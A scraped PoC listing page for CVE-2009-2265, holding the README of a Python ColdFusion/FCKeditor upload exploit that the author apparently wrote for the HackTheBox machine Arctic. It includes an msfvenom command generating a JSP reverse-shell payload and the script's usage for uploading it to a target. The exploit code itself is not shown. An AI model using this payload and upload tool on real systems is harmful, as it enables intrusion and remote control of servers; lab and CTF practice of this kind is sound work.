CVE-2009-2265 PoC — FCKeditor 路径遍历漏洞

Source

Associated Vulnerability

Description

coldfusion exploit based on https://cvedetails.com/cve/CVE-2009-2265/

Readme

# zaphoxx-coldfusion
coldfusion exploit based on https://cvedetails.com/cve/CVE-2009-2265/

The main reason I setup a python script for this particular cve was that the metasploit version of the same did not work for me when I tried to solve the HTB machine Arctic. Also it was nice to get some little python pratice. However there is another python version of that same exploit around which was originally created by Alexander Reid if you prefer to use his version.

Usage is pretty simple:

Make sure you have a payload file created 

e.g. using msfvenom:
`msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=<yourip> LPORT=<yourport> -o shell.jsp`

usage: `python3 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]`

   `usage: 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]`
   
optional arguments:
  
  `-h, --help   show this help message and exit`
  
  `-t TARGET    target ip`
  
  `-p PORT      target port`
  
  `-f FILEPATH  path of file with shellcode to upload`
  
  `-b BASEPATH  coldfusion basepath`

File Snapshot

 [4.0K]  /data/pocs/bc065872d9e033b85848235e85d68aff0283776c
├── [3.0K]  2265.py
└── [1.0K]  README.md

0 directories, 2 files

Remarks